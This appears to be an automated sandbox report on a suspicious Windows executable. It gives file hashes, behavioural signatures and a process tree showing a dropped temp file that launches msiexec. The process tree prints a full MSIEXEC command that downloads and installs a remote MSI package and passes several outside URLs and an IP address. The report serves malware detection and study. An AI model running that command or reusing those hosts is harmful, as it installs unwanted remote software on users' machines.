Analysis
  max time kernel: 16s
  max time network: 17s
  platform: windows7_x64
  resource: win7-20240708-en
  resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted: 25/08/2024, 07:04
Static task: static1
Behavioral task: behavioral1
  Sample: ecb85d95c4aca1202e34c2b125a2c250N.exe
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: ecb85d95c4aca1202e34c2b125a2c250N.exe
  Resource: win10v2004-20240802-en
General
  Target: ecb85d95c4aca1202e34c2b125a2c250N.exe
  Size: 1.4MB
  MD5: ecb85d95c4aca1202e34c2b125a2c250
  SHA1: 7ab9fe65804ab65b141b61d5d78d1cd51863a5f3
  SHA256: 65ec76bf52dbdb94fa4fb5d83b6445f910c33a5288f618e7d91385be660f17eb
  SHA512: 0231e6cd4edba9658d7ec17f69dfc859898af4e86107fca1add797ad97861cc908f2589cfcc6946f6c0da0095dbc2606292a2ba1a395e2541878c2f905365df9
  SSDEEP: 24576:SaQv0pic0lIpgYtQsCeya+QuVBY/H/wUUG/y324CDDlUNbaIWMi:Sa1peIVQsTCYf4LGvvDRUgHMi
Malware Config
Signatures
  Executes dropped EXE (1 IoC)
    PID 1444  ~pcicvvgipa.tmp
  Loads dropped DLL (1 IoC)
    PID 1928  ecb85d95c4aca1202e34c2b125a2c250N.exe
  Use of msiexec (install) with remote resource (1 IoC)
    PID 2756  MSIEXEC.EXE
  System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ecb85d95c4aca1202e34c2b125a2c250N.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ~pcicvvgipa.tmp
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MSIEXEC.EXE
  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    Token: SeShutdownPrivilege       PID 2756  MSIEXEC.EXE
    Token: SeIncreaseQuotaPrivilege  PID 2756  MSIEXEC.EXE
  Suspicious use of FindShellTrayWindow (2 IoCs)
    PID 2756  MSIEXEC.EXE
    PID 2756  MSIEXEC.EXE
  Suspicious use of WriteProcessMemory (14 IoCs)
    PID 1928 wrote to memory of 1444  ecb85d95c4aca1202e34c2b125a2c250N.exe  procid_target 30  (7 identical entries)
    PID 1444 wrote to memory of 2756  ~pcicvvgipa.tmp  procid_target 31  (7 identical entries)
Processes
  C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe  (PID 1928)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe"
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp  (PID 1444)
      Command line: "C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\MSIEXEC.EXE  (PID 2756)
        Command line: MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/allstar/All Star Slots20160209125305.msi" DDC_DID=1454323 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=1454323 DDC_UPDATESTATUSURL=http://190.4.94.65:8080/allstar/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.94.65:8080/allstar/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~pcicvvgipa.tmp"
        - Use of msiexec (install) with remote resource
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Downloads